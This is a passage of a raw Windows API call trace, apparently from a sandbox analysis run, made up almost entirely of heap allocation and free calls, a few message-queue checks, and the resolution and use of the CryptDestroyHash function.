(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0227.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0227.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0227.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0227.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0227.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0227.342] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0227.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0227.399] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.399] CryptDestroyHash (hHash=0xa87090) returned 1 [0227.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0227.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 